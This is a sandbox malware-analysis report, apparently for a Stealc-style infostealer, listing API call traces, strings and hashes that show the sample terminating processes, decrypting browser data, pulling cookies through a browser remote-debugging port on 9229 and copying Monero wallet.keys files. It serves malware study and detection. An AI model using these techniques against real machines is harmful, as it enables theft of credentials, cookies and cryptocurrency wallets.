                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$memset$lstrcpy$Desktopwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                  • API String ID: 3051782728-1862457068
                                  • Opcode ID: 01a6bee18ed5dfbe803fba54a4b10557431d3d6a93272016381d304e02cc42ca
                                  • Instruction ID: 4ae631d0d62599e0d69f2ca8b6bc1a20604aa6dc43fac716a152ee9845e418e7
                                  • Opcode Fuzzy Hash: 01a6bee18ed5dfbe803fba54a4b10557431d3d6a93272016381d304e02cc42ca
                                  • Instruction Fuzzy Hash: 47913D71614384AFD720EB74DC49FDB77E8FF89700F508919B689C7291DBB0A9048BA6
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009046D9
                                  • Process32First.KERNEL32(00000000,00000128), ref: 009046E9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 009046FB
                                  • StrCmpCA.SHLWAPI(?,?), ref: 0090470D
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00904722
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00904731
                                  • CloseHandle.KERNEL32(00000000), ref: 00904738
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00904746
                                  • CloseHandle.KERNEL32(00000000), ref: 00904751
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 7063f054a6346edcb6037536fe39ead26a3027397865510cbe5afad45a125100
                                  • Instruction ID: 15547ca7071f2b05cb1562a23e79ac38dfaa3b1f7f93a593b3f1086be0c0fb6f
                                  • Opcode Fuzzy Hash: 7063f054a6346edcb6037536fe39ead26a3027397865510cbe5afad45a125100
                                  • Instruction Fuzzy Hash: EA019271601114AFE7215B60DC8DFFE377CEB49B51F404198FA09D6180EF749A858B65
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 008E769E
                                  • HeapAlloc.KERNEL32(00000000), ref: 008E76A5
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008E76CD
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 008E76ED
                                  • LocalFree.KERNEL32(?), ref: 008E76F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 3657800372-0
                                  • Opcode ID: 24bc84c863ddb5b52a20cf5d6ef28f09906ad3651200a65591821374d947fd4c
                                  • Instruction ID: 305b32e876273bad769567f3f7bba0f85618233b05b0c08c6e3f5e1ea39979c9
                                  • Opcode Fuzzy Hash: 24bc84c863ddb5b52a20cf5d6ef28f09906ad3651200a65591821374d947fd4c
                                  • Instruction Fuzzy Hash: DB011275B403087BEB10DB949C4AFEA7778EB48B11F108155FB09EB2C0DAB099018790
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 009040AD
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 009040BC
                                  • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 009040C3
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 009040F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptHeapString$AllocProcess
                                  • String ID:
                                  • API String ID: 3939037734-0
                                  • Opcode ID: b129bbc59590e4d42b1f31a3ebc1ec8d4388273607cd057aa459b34f8d8d6a8c
                                  • Instruction ID: 7bb8799787808161f2fb0e2399d865e865114bf07f7af2868feb0c6afe65e4ee
                                  • Opcode Fuzzy Hash: b129bbc59590e4d42b1f31a3ebc1ec8d4388273607cd057aa459b34f8d8d6a8c
                                  • Instruction Fuzzy Hash: 2E011AB1600209AFDB109FA5EC99BAABBBDEF89311F108059BE0997240DE719D508B60
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008E9BFF
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 008E9C13
                                  • memcpy.MSVCRT(00000000,?), ref: 008E9C2A
                                  • LocalFree.KERNEL32(?), ref: 008E9C37
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                  • String ID:
                                  • API String ID: 3243516280-0
                                  • Opcode ID: bd855a7db995371d3106b25d7b8c3c46f2ead6b7f7b0d6b643b28bbc72fd77b3
                                  • Instruction ID: 47000536db9928f7e65003046376bd0d0366d1a1e1ee39305cb8779e591b32e1
                                  • Opcode Fuzzy Hash: bd855a7db995371d3106b25d7b8c3c46f2ead6b7f7b0d6b643b28bbc72fd77b3
                                  • Instruction Fuzzy Hash: F401FB75A4130AABD710DBA4DC59BAAB778EB44B00F504554EE04EB284DBB09A118BE0
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 008E9B9B
                                  • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 008E9BAA
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 008E9BC1
                                  • LocalFree.KERNEL32(?,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 008E9BD0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: 231fa092b15c90731990db574c29c511ac2e793a7e6a6bc79ca48988a0423a6f
                                  • Instruction ID: b7c39484cf82fabdfabbf5b41b8ae846fdfebc768bb6c3deb09e1a931c9596e8
                                  • Opcode Fuzzy Hash: 231fa092b15c90731990db574c29c511ac2e793a7e6a6bc79ca48988a0423a6f
                                  • Instruction Fuzzy Hash: 61F0BDB03443627BF7305F65AC59F967BACEB45B61F240414FA49EA2C0DBB49840CAA4
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 00903E45
                                  • lstrcpy.KERNEL32(00000000,010C4B10), ref: 00903E6F
                                  • GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,008E4D2A,?,00000014), ref: 00903E79
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$SystemTime
                                  • String ID:
                                  • API String ID: 684065273-0
                                  • Opcode ID: f3b81195efbfda54dc9249140bf9cc918f091f485a44b655ed427cb5ebed3d56
                                  • Instruction ID: f24a9e7d4b1d28e11c9578b3a8becfc6c4d7f4b8829fcd9c3db62f2b4fe0f6f3
                                  • Opcode Fuzzy Hash: f3b81195efbfda54dc9249140bf9cc918f091f485a44b655ed427cb5ebed3d56
                                  • Instruction Fuzzy Hash: 9A416C75A112469FDB14CF29C8846A6BBF8FF09710B09C0A9E949DB3A2C771ED42CB40
                                  APIs
                                  • memset.MSVCRT ref: 008E108A
                                    • Part of subcall function 008E1000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E1015
                                    • Part of subcall function 008E1000: HeapAlloc.KERNEL32(00000000), ref: 008E101C
                                    • Part of subcall function 008E1000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 008E1039
                                    • Part of subcall function 008E1000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 008E1053
                                    • Part of subcall function 008E1000: RegCloseKey.ADVAPI32(?), ref: 008E105D
                                  • lstrcatA.KERNEL32(?,00000000), ref: 008E10A0
                                  • lstrlenA.KERNEL32(?), ref: 008E10AD
                                  • lstrcatA.KERNEL32(?,.keys), ref: 008E10C8
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E10FF
                                  • lstrlenA.KERNEL32(010CD598), ref: 008E110D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E1131
                                  • lstrcatA.KERNEL32(00000000,010CD598), ref: 008E1139
                                  • lstrlenA.KERNEL32(\Monero\wallet.keys), ref: 008E1144
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1168
                                  • lstrcatA.KERNEL32(00000000,\Monero\wallet.keys), ref: 008E1174
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008E119A
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E11DF
                                  • lstrlenA.KERNEL32(010D04B0), ref: 008E11EE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E1215
                                  • lstrcatA.KERNEL32(00000000,?), ref: 008E121D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1258
                                  • lstrcatA.KERNEL32(00000000), ref: 008E1265
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008E128C
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 008E12B5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E12E1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E131D
                                    • Part of subcall function 008FEF30: lstrcpy.KERNEL32(00000000,?), ref: 008FEF62
                                  • DeleteFileA.KERNEL32(?), ref: 008E1351
                                  • memset.MSVCRT ref: 008E136E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocCloseCopyDeleteOpenProcessQueryValue
                                  • String ID: .keys$\Monero\wallet.keys
                                  • API String ID: 2734118222-3586502688
                                  • Opcode ID: 5fff0b46314d9827f52375c7e5c06c8aa9792009a20ce57636cd4ad36eaf8382
                                  • Instruction ID: 4deb289298fe2d9dc9ff274c2225ef2dbf7863a1005eedd715d237f279d896c9
                                  • Opcode Fuzzy Hash: 5fff0b46314d9827f52375c7e5c06c8aa9792009a20ce57636cd4ad36eaf8382
                                  • Instruction Fuzzy Hash: B3A17E71A01296ABCB10EFBADC49A9E7BB8FF46700F444024FA05E7251DF70DE518BA1
                                  APIs
                                    • Part of subcall function 008E90F0: InternetOpenA.WININET(0090D014,00000001,00000000,00000000,00000000), ref: 008E910F
                                    • Part of subcall function 008E90F0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 008E912C
                                    • Part of subcall function 008E90F0: InternetCloseHandle.WININET(00000000), ref: 008E9139
                                    • Part of subcall function 008E90F0: strlen.MSVCRT ref: 008E9155
                                  • strlen.MSVCRT ref: 008E9311
                                  • strlen.MSVCRT ref: 008E932A
                                    • Part of subcall function 008F7EB0: memchr.MSVCRT ref: 008F7EEF
                                    • Part of subcall function 008F7EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 008F7F09
                                    • Part of subcall function 008F7EB0: memchr.MSVCRT ref: 008F7F28
                                    • Part of subcall function 008E89B0: std::_Xinvalid_argument.LIBCPMT ref: 008E89C6
                                  • memset.MSVCRT ref: 008E9371
                                  • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 008E938C
                                  • lstrcatA.KERNEL32(?,00000000), ref: 008E93A2
                                  • strlen.MSVCRT ref: 008E93C9
                                  • strlen.MSVCRT ref: 008E9416
                                  • memcmp.MSVCRT(?,0090D014,?), ref: 008E943B
                                  • memset.MSVCRT ref: 008E9562
                                  • lstrcatA.KERNEL32(?,cookies), ref: 008E9577
                                  • lstrcatA.KERNEL32(?,00911D5C), ref: 008E9589
                                  • lstrcatA.KERNEL32(?,?), ref: 008E959A
                                  • lstrcatA.KERNEL32(?,00915150), ref: 008E95AC
                                  • lstrcatA.KERNEL32(?,?), ref: 008E95BD
                                  • lstrcatA.KERNEL32(?,.txt), ref: 008E95CF
                                  • lstrlenA.KERNEL32(?), ref: 008E95E6
                                  • lstrlenA.KERNEL32(?), ref: 008E960B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E9644
                                  • memset.MSVCRT ref: 008E968C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
